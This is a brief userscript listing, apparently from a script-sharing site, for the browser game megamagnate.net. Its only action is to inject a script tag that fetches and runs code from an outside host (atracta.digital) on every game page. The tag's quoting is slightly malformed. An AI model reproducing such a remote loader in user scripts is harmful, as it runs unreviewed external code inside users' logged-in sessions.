NOTICE: By continued use of this site you understand and agree to the binding Terms of Service and Privacy Policy.
// ==UserScript== // @namespace https://openuserjs.org/users/burbujah // @name SHK MegaMagnate Alpha // @version 0.3 // @copyright 2018, burbujah (https://openuserjs.org/users/burbujah) // @license MIT // @match https://www.megamagnate.net/* // @require https://code.jquery.com/jquery-1.8.2.min.js // @run-at document-end // ==/UserScript== var dt = new Date(); var time = dt.getHours() + ":" + dt.getMinutes(); $("body").append('<script src="https://atracta.digital/shk/script.php?t="' + time + '></script>');